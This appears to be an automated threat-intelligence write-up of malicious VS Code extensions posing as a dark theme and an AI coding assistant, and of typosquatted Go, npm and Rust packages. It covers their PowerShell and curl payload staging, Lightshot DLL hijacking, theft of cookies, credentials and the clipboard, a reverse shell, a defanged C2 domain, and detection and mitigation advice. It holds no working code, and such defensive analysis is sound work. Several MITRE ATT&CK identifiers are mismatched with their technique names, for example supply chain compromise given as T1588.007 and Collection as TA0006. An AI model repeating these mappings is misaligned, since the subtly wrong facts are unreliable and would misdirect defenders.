Full Report
Cybersecurity researchers have discovered two new extensions on Microsoft Visual Studio Code (VS Code) Marketplace that are designed to infect developer machines with stealer malware. The VS Code extensions masquerade as a premium dark theme and an artificial intelligence (AI)-powered coding assistant, but, in actuality, harbor covert functionality to download additional payloads, take
Analysis Summary
# Tool/Technique: Malicious VS Code Extensions (BigBlack.bitcoin-black, BigBlack.codo-ai)
## Overview
Two malicious extensions were discovered on the Microsoft Visual Studio Code (VS Code) Marketplace masquerading as benign developer utilities (a dark theme and an AI coding assistant). Their primary purpose is to download and execute secondary malicious payloads to steal sensitive developer data, including credentials, clipboard contents, and session data.
## Technical Details
- Type: Malware/Loader (via Ecosystem Compromise)
- Platform: Windows (utilizes PowerShell)
- Capabilities: Payload download/extraction, credential theft, process listing, screenshot capture, data exfiltration.
- First Seen: December 2025 (based on removal dates)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1588.007 - Obtain Capabilities: Acquire Infrastructure: Compromise Software Supply Chain
- TA0002 - Execution
- T1059.001 - Command and Scripting Interpreter: PowerShell
- TA0005 - Defense Evasion
- T1218 - Signed Binary Proxy Execution (via DLL Hijacking)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
- TA0006 - Credential Access
- T1115 - Clipboard Data
- T1140 - Deobfuscate/Decode Files or Information
- T1003 - OS Credential Dumping (Implied via Wi-Fi password theft)
- TA0006 - Collection
- T1005 - Data from Local System (Wi-Fi credentials, App lists, Process lists)
- T1113 - Screen Capture
## Functionality
### Core Capabilities
* **Masquerading:** Posing as "BigBlack.bitcoin-black" (dark theme) and "BigBlack.codo-ai" (AI assistant).
* **Initial Payload Stage:** Executing a PowerShell script to download a password-protected ZIP archive from an external server.
* **Payload Extraction:** Using multiple methods to extract the main payload, including native `Expand-Archive`, .NET libraries, DotNetZip, and 7-Zip. *Note: Visibility of error handling suggested early versions were noisy.*
* **Streamlined Execution:** Later versions switched to easier evasion using a batch script and `curl` to download an executable and a malicious DLL.
### Advanced Features
* **DLL Hijacking:** Loading the malicious `Lightshot.dll` via the legitimate Lightshot binary (`Lightshot.exe`) for execution under a trusted process context.
* **Data Harvesting:**
* Gathering contents of the clipboard.
* Collecting a list of installed applications and running processes.
* Taking desktop screenshots.
* Stealing stored Wi-Fi credentials.
* Harvesting detailed system information.
* **Session Hijacking:** Launching Google Chrome and Microsoft Edge in headless mode to steal stored browser cookies and hijack user sessions.
## Indicators of Compromise
- File Hashes: N/A (Not provided in text)
- File Names: `Lightshot.dll` (Malicious DLL), Name of the main executable (Lightshot binary used for hijacking).
- Registry Keys: N/A
- Network Indicators: `syn1112223334445556667778889990[.]org` (Defanged C2 for initial payload download)
- Behavioral Indicators: Visible PowerShell window (indicative of older version), Spawning `curl` process (newer version), Fileless execution utilizing legitimate signed binaries for code execution.
## Associated Threat Actors
The publisher name "BigBlack" and associated package names suggest a single, coordinated campaign, but specific established threat actor attribution (e.g., APT group) is not detailed in the text.
## Detection Methods
- Signature-based detection: Signatures against the ZIP archive password or known C2 domains (if observed post-removal).
- Behavioral detection: Monitoring VS Code extensions for unusual outbound network connections to external domains, use of `Expand-Archive` on non-standard archives, or the spawning of `curl` or PowerShell in connection with extension activation hooks. Detection against the DLL hijacking pattern involving the Lightshot binary.
- YARA rules: Could be developed for known strings or structural elements within the extracted secondary payload.
## Mitigation Strategies
- **Vendor Awareness:** Restrict installations of extensions from untrusted or unknown publishers on developer workstations.
- **Principle of Least Privilege:** Developers should not run under highly privileged accounts, limiting the impact of credential theft.
- **Application Allowlisting:** Restricting execution of unauthorized executables or scripts (like the downloaded stage payloads).
- **Monitor Marketplace Security:** Reviewing newly published extensions for potential signs of low quality, low install count, and generic/misleading names.
- **Network Monitoring:** Blocking or logging traffic to known malicious infrastructure used for payload delivery.
## Related Tools/Techniques
* **Ecosystem Compromise:** Similar to the mentioned malicious Go, npm, and Rust packages found exploiting software supply chains.
* **DLL Side-Loading/Hijacking:** A technique used here to achieve execution via a trusted binary (`Lightshot`).
* **Stealer Malware:** The ultimate goal is data exfiltration, consistent with common infostealer operations.
---
# Tool/Technique: Malicious Go, NPM, and Rust Packages (Supply Chain)
## Overview
This refers to a broader set of malicious packages discovered across multiple developer ecosystems (Go, npm, Rust) designed to steal sensitive data by impersonating legitimate, trusted libraries.
## Technical Details
- Type: Malware/Loader (Ecosystem Implant)
- Platform: Go, Node.js (npm), Rust environments.
- Capabilities: Data exfiltration, reverse shell execution, credential harvesting.
- First Seen: Go packages noted as active since 2021.
## MITRE ATT&CK Mapping
*Identified techniques across the various packages:*
- T1588.006 - Supply Chain Compromise (General)
- T1048 - Exfiltration Over Alternative Protocol (If reverse shell is used)
- T1071.001 - Application Layer Protocol: Web Protocols (for exfiltration endpoints)
## Functionality
### Core Capabilities
* **Go Packages (`uuid` typosquatting):** Typoosquatting legitimate libraries (`github[.]com/google/uuid`, `github[.]com/pborman/uuid`) using similar names (`github[.]com/bpoorman/uuid`, `github[.]com/bpoorman/uid`). Exfiltration triggers when an application calls a helper function named "valid" along with specific data.
* **NPM Packages (`elf-stats-*`):** A family of 420 unique packages designed to execute a reverse shell and exfiltrate files to a Pipedream endpoint.
* **Rust Crate (`finch-rust`):** Impersonates the "finch" library. It acts as a malware loader containing legitimate code plus a single malicious line to execute a secondary payload (`sha-rust`) when the developer uses the library's sketch serialization functionality.
### Advanced Features
* **Targeted Execution:** The Rust loader's malicious execution is tied to a specific, unique function call ("sketch serialization"), potentially aiming for stealth.
* **Reverse Shell Capability:** The npm packages included the capability to establish an interactive reverse shell.
## Indicators of Compromise
- File Hashes: N/A
- File Names: `elf-stats-*` (npm family), `sha-rust` (Rust payload).
- Registry Keys: N/A
- Network Indicators: Dpaste site (for Go package data), Pipedream endpoint (for npm exfiltration).
- Behavioral Indicators: Network connections to Pipedream or dpaste sites initiated by Go, npm, or Rust application processes.
## Associated Threat Actors
* The npm package set is associated with a "likely French-speaking threat actor."
* No specific actor attribution provided for the Go or Rust implants beyond the publisher names.
## Detection Methods
- **Dependency Scanning:** Utilizing Software Composition Analysis (SCA) tools to detect known malicious package names or suspicious behavior triggered by function calls (e.g., dependency on `dpaste` endpoints).
- **Network Inspection:** Identifying outbound connections from development tools/compilers to known paste sites or non-standard exfiltration endpoints like Pipedream.
- **Code Review:** For highly critical projects, manual review of imported source code, especially looking for unexpected use of file serialization methods (Rust).
## Mitigation Strategies
* **Repository Pinning:** Pin dependencies to specific, verified versions, avoiding dependency on broad range or dynamic version specification.
* **SCA Tooling:** Implement strict SCA policies across the SDLC, focusing on detecting typosquatting and suspicious network calls post-build.
* **Credential Monitoring:** Ensure development environment secrets are not accessible during standard library execution flows.
## Related Tools/Techniques
* Ecosystem-specific dependency confusion or typosquatting attacks targeting various language package managers.